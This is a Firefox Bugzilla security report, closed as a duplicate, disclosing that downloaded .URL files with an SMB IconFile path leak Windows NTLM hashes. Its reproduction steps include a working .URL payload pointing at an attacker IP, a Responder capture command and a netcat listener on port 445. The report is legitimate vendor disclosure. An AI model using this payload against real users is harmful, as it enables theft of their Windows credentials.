Closed
Bug 1812338
Opened 2 years ago
Closed 2 years ago
.URL file can also send NTLM hashes
Categories
(Firefox :: Security, defect)
Firefox
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1809923
People
(Reporter: haxatron1, Unassigned)
Details
(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(1 file)
|
4.76 MB,
video/webm
|
Details |
On Windows, .URL file can also send NTLM hashes via the IconFile parameter. Thus it is possible to reproduce https://bugzilla.mozilla.org/show_bug.cgi?id=1773894 using .URL file
Flags: sec-bounty?
STR
- Host example.url on a server
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
IDList=
URL=\192.168.1.109\test\test.ico
IconFile=\192.168.1.109\test\test.ico
HotKey=0
- Replace all instances of 192.168.1.109 with your responder IP address.
- Start responder using responder -I eth0 -wvd
- Create a link that download example.url, see that example.url is downloaded by Firefox without any warning, click Show in Folder and the hash is leaked.
Alternatively, if you don't want to download responder, you may also verify that .url files are sending the hash.
Instead of Step 2, you can start a netcat server using
nc -nvlp 445
And when you download example.url and click Show in Folder a connection to your netcat server is made. On Windows, SMB connection will result in auto-forwarding NTLM hash.
|
||
Updated•2 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Duplicate of bug: CVE-2023-25734
Resolution: --- → DUPLICATE
|
||
Updated•2 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•1 year ago
|
Group: firefox-core-security
|
||
Updated•8 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•